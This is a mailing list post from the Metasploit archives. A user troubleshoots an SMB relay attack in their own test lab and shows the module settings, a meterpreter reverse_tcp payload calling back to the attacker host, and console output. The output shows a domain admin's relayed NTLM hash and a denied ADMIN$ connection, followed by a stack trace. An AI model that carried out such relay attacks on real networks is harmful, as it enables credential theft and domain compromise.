Metasploit mailing list archives
SMB_RELAY attacks still possible?
From: Brian S Traveling <epicdonk () gmail com>
Date: Fri, 24 Dec 2010 13:22:15 -0700
Hi,

Is it possible to still carry out smb_relay attacks by specifying a different SMBHOST? It doesn't seem to be working for me... I was under the assumption it was still possible...

my test environment:

domain controller: 192.168.0.1 (also dhcp/router)
windows 7 workstation: 192.168.0.2 (clicking the UNC path - joined to domain)
metasploit box: 192.168.0.35 (not joined to domain)

msf exploit(smb_relay) > show options

Module options:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SMBHOST     192.168.0.1      no        The target SMB server (leave empty for originating system)
   SRVHOST     192.168.0.35     yes       The local host to listen on.
   SRVPORT     445              yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, none, process
   LHOST     192.168.0.35     yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(smb_relay) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.0.35:4444
[*] Server started.
msf exploit(smb_relay) > [*] Received 192.168.0.2:62573 MYDOMAIN\domainadmin LMHASH:000000000000000000000000000000000000000000000000 NTHASH:91fw9w155441a411b1a40edf8d7adlf70101000000000000a2cwcbd785a2cb020f640031811663700000000020000000000000000000000 OS: LM:
[*] Authenticating to 192.168.0.1 as MYDOMAIN\domainadmin...
[*] AUTHENTICATED as MYDOMAIN\domainadmin...
[*] Connecting to the ADMIN$ share...
[*] Error processing request from 192.168.0.2:62573 (115): Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_ACCESS_DENIED (Command=117 WordCount=0)
/opt/metasploit3/msf3/lib/rex/proto/smb/client.rb:176:in `smb_recv_parse'
/opt/metasploit3/msf3/lib/rex/proto/smb/client.rb:994:in `tree_connect'
/opt/metasploit3/msf3/lib/rex/proto/smb/simpleclient.rb:253:in `connect'
(eval):133:in `smb_haxor'
(eval):530:in `smb_cmd_session_setup'
(eval):332:in `smb_cmd_dispatch'
/opt/metasploit3/msf3/lib/msf/core/exploit/smb.rb:716:in `smb_recv'
/opt/metasploit3/msf3/lib/msf/core/exploit/smb.rb:647:in `on_client_data'
/opt/metasploit3/msf3/lib/msf/core/exploit/tcp.rb:386:in `start_service'
/opt/metasploit3/msf3/lib/rex/io/stream_server.rb:45:in `call'
/opt/metasploit3/msf3/lib/rex/io/stream_server.rb:45:in `on_client_data'
/opt/metasploit3/msf3/lib/rex/io/stream_server.rb:182:in `monitor_clients'
/opt/metasploit3/msf3/lib/rex/io/stream_server.rb:180:in `each'
/opt/metasploit3/msf3/lib/rex/io/stream_server.rb:180:in `monitor_clients'
/opt/metasploit3/msf3/lib/rex/io/stream_server.rb:69:in `start'
/opt/metasploit3/msf3/lib/rex/thread_factory.rb:21:in `call'
/opt/metasploit3/msf3/lib/rex/thread_factory.rb:21:in `spawn'
/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:64:in `call'
/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:64:in `spawn'
/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:57:in `initialize'
/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:57:in `new'
/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:57:in `spawn'
/opt/metasploit3/msf3/lib/rex/thread_factory.rb:21:in `spawn'
/opt/metasploit3/msf3/lib/rex/io/stream_server.rb:68:in `start'
/opt/metasploit3/msf3/lib/msf/core/exploit/tcp.rb:393:in `start_service'
/opt/metasploit3/msf3/lib/msf/core/exploit/tcp.rb:313:in `exploit'
/opt/metasploit3/msf3/lib/msf/core/exploit_driver.rb:201:in `job_run_proc'
/opt/metasploit3/msf3/lib/msf/core/exploit_driver.rb:148:in `run'
/opt/metasploit3/msf3/lib/rex/job_container.rb:36:in `call'
/opt/metasploit3/msf3/lib/rex/job_container.rb:36:in `start'
/opt/metasploit3/msf3/lib/rex/thread_factory.rb:21:in `call'
/opt/metasploit3/msf3/lib/rex/thread_factory.rb:21:in `spawn'
/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:64:in `call'
/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:64:in `spawn'
/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:57:in `initialize'
/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:57:in `new'
/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:57:in `spawn'
/opt/metasploit3/msf3/lib/rex/thread_factory.rb:21:in `spawn'
/opt/metasploit3/msf3/lib/rex/job_container.rb:31:in `start'
/opt/metasploit3/msf3/lib/rex/job_container.rb:155:in `start_bg_job'
/opt/metasploit3/msf3/lib/msf/core/exploit_driver.rb:145:in `run'
/opt/metasploit3/msf3/lib/msf/base/simple/exploit.rb:125:in `exploit_simple'
/opt/metasploit3/msf3/lib/msf/base/simple/exploit.rb:147:in `exploit_simple'
/opt/metasploit3/msf3/lib/msf/ui/console/command_dispatcher/exploit.rb:154:in `cmd_exploit'
/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:246:in `send'
/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:246:in `run_command'
/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:208:in `run_single'
/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:202:in `each'
/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:202:in `run_single'
/opt/metasploit3/msf3/lib/rex/ui/text/shell.rb:143:in `run'
/usr/local/bin/msfconsole:124/SMBRelay

Thanks!
Current thread:
- SMB_RELAY attacks still possible? Brian S Traveling (Dec 24)
- Re: SMB_RELAY attacks still possible? Epic (Dec 24)
- Re: SMB_RELAY attacks still possible? Kurt Grutzmacher (Dec 24)
- Re: SMB_RELAY attacks still possible? Epic (Dec 24)